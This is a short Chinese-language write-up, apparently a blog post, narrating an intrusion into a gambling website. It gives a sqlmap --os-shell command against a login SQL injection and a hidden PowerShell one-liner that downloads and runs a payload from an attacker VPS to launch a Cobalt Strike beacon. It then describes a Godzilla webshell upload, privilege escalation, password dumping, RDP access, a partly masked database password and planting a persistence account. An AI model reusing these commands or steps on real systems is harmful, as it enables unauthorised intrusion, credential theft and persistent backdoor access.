记一次QP渗透测试实战
该站点为棋牌站点,都被大佬们玩烂了:
登录处存在sql注入,可以直接获取shell,抓包获取请求包:
上sqlmap,个人习惯sqlmap语句:python2 .\sqlmap.py -r .\1.txt --batch --random-agent --fresh-queries --dbms mssql --os-shell
执行powershell命令,直接上线cs:powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://vpsip/payload.ps1'))"
查看cs,已经成功上线:
不存在域:
翻一下目录,看能不能传一个哥斯拉,直接提权的那种,不过话说棋牌还谈业绩???
这个站上好几个棋牌目录:
日了狗的,找路径找了半天,后面根据时间找到了,上传哥斯拉:
上传成功,哥斯拉连接成功:
提权成功:
利用powershell,直接cs 上线system权限:
抓取管理员密码,芜湖,起飞~~:
看下开放3389端口没~~,开放了呀,尝试登陆:
代理都不用了,直接连上:
查看配置文件,账号:sa,密码Qq166xxxx0373:
查找了一下qq,没找到,好像是一个手机号:
不管了,有个DATA.rar文件150多M,下载不下来,,,连接数据库康康,代理都不用,又直接连上了:
看了几眼,懒得看,,,
后续?哪来的后续,,加个账户走人:
